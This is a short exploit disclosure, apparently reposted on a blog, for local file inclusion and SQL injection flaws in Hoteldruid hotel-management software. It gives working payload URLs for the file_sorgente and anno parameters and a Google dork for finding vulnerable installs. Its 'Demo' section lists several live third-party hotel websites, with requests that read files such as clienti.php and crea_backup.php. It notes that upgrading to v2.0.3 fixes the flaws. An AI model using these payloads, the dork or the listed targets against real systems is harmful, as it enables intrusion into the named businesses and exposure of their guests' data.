+] Author: TUNISIAN CYBER[+] Exploit Title: Hoteldruid (PHP-residence) v1.X.X (SQLi/LFI) Multiple Vulenrabilities[+] Date: 14-12-2013[+] Category: WebApp[+] Vendor: http://www.hoteldruid.com/en/download.html[+] Google Dork: inurl:"mostra_sorgente.php"[+] Tested on: Win7 , ubuntu 13.04 ########################################################################################Description:Hoteldruid is an open source program for hotel management (property management software) suffers from Local File Inclusion and SQL injectionI/LFI:http://127.0.0.1/php-residence/mostra_sorgente.php?file_sorgente=[FILE]II/SQLi:http://127.0.0.1/php-residence/creaprezzi.php?anno=[YEAR]'http://127.0.0.1/php-residence/messaggi.php?id_sessione=&anno=[YEAR]'Fix:Upgrade to v2.0.3Demo:http://www.hoteldruid.com/demo/mostra_sorgente.php?file_sorgente=clienti.phphttps://lodginginspirational.com/mostra_sorgente.php?file_sorgente=clienti.phphttp://www.at184.com/availability/mostra_sorgente.php?file_sorgente=/http://www.pantelleriaest.com/hoteldruid/mostra_sorgente.php?file_sorgente=crea_backup.phphttp://tbg.evolve2.org/mostra_sorgente.php?file_sorgente=themes/snj/php/menu.php
Hiç yorum yok:
Yorum Gönder